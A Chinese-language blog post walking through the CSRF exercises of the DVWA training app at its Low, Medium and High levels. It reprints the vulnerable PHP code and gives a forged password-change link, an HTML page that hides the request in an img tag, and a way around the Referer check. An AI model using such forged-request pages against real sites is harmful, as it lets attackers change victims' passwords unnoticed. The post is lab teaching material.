DVWA 之 CSRF跨站请求伪造 全等级

一、漏洞概述

CSRF(Cross site request forgery ):跨站请求伪造。

CSRF是指利用受害者尚未失效的身份认证信息(cookie、会话信息),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害人的身份向服务器发送请求,从而完成非法操作。

二、工具

burp suite、firefox

三、测试过程

1、级别:Low

贴上代码:

 1 <?php
 2 
 3 if( isset( $_GET[ 'Change' ] ) ) {
 4     // Get input
 5     $pass_new  = $_GET[ 'password_new' ];
 6     $pass_conf = $_GET[ 'password_conf' ];
 7 
 8     // Do the passwords match?
 9     if( $pass_new == $pass_conf ) {
10         // They do!
11         $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
12         $pass_new = md5( $pass_new );
13 
14         // Update the database
15         $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
16         $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
17 
18         // Feedback for the user
19         echo "<pre>Password Changed.</pre>";
20     }
21     else {
22         // Issue with passwords matching
23         echo "<pre>Passwords did not match.</pre>";
24     }
25 
26     ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
27 }
28 
29 ?>

 

从代码可以看出服务器通过GET方式收到更改密码的请求后会比较参数pass_new和pass_conf是否一致,如果一致会执行修改密码操作。

输入密码进行更改:

clipboard

点击change后得到链接:

http://IP地址/dvwa/vulnerabilities/csrf/?password_new=新密码&password_conf=确认密码&Change=Change#

所以我们构造链接,将两个参数的值改变即可。

值得注意的是,CSRF是利用受害者的cookie向服务器发送伪造请求,因为不同浏览器间的cookie不是通用,所以受害着使用同一浏览器打开链接时才会攻击成功。

ps:由于链接过于直接,比较容易看出,我们可以做一个web页面进行隐藏。

例如:

  1 <html>
  2 
  3     <head>
  4     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5     <title>change</title>
  6     <img src="http://IP地址/dvwa/vulnerabilities/csrf/?password_new=新密码&password_conf=确认密码&Change=Change#"/>
  7 
  8     </head>
  9     <p> success </p>
 10 </html>

 

 

2、级别:Medium

贴上源码:

 1 <?php
 2 
 3 if( isset( $_GET[ 'Change' ] ) ) {
 4     // Checks to see where the request came from
 5     if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
 6         // Get input
 7         $pass_new  = $_GET[ 'password_new' ];
 8         $pass_conf = $_GET[ 'password_conf' ];
 9 
10         // Do the passwords match?
11         if( $pass_new == $pass_conf ) {
12             // They do!
13             $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
14             $pass_new = md5( $pass_new );
15 
16             // Update the database
17             $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
18             $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
19 
20             // Feedback for the user
21             echo "<pre>Password Changed.</pre>";
22         }
23         else {
24             // Issue with passwords matching
25             echo "<pre>Passwords did not match.</pre>";
26         }
27     }
28     else {
29         // Didn't come from a trusted source
30         echo "<pre>That request didn't look correct.</pre>";
31     }
32 
33     ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
34 }
35 
36 ?>

 

我们发现与low级别相比多了:    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

HTTP_REFERER:http包头的Referer参数的值,表示来源地址

SERVER_NAME:http包头的Host参数,即要访问的主机名

当检查到 HTTP_REFERER中包含SERVER_NAME的时候,就可以完成改密码的操作。

那么我们可以使用burp suite抓包获得参数:

clipboard

此时构造一个HTML,  将文件名改为用户主机IP,放在网站根目录下打开即可成功攻击。

 

 

3、级别:High

贴上代码:

  1 <?php
  2 
  3 if( isset( $_GET[ 'Change' ] ) ) {
  4     // Check Anti-CSRF token
  5     checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
  6 
  7     // Get input
  8     $pass_new  = $_GET[ 'password_new' ];
  9     $pass_conf = $_GET[ 'password_conf' ];
 10 
 11     // Do the passwords match?
 12     if( $pass_new == $pass_conf ) {
 13         // They do!
 14         $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
 15         $pass_new = md5( $pass_new );
 16 
 17         // Update the database
 18         $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
 19         $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
 20 
 21         // Feedback for the user
 22         echo "<pre>Password Changed.</pre>";
 23     }
 24     else {
 25         // Issue with passwords matching
 26         echo "<pre>Passwords did not match.</pre>";
 27     }
 28 
 29     ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
 30 }
 31 
 32 // Generate Anti-CSRF token
 33 generateSessionToken();
 34 
 35 ?>

  High级别代码加入了Anti-CSRF token机制,用户每次执行改密操作服务器都会返回一个随机的token,向服务器发送请求时需要提交token参数,服务器会优先检查token,只有token正确才会处理客户端请求,这一机制杜绝了利CSRF漏洞修改密码,需使用xss组合进行攻击。

posted @ 2020-03-26 22:19  何包蛋  阅读(316)  评论(0编辑  收藏  举报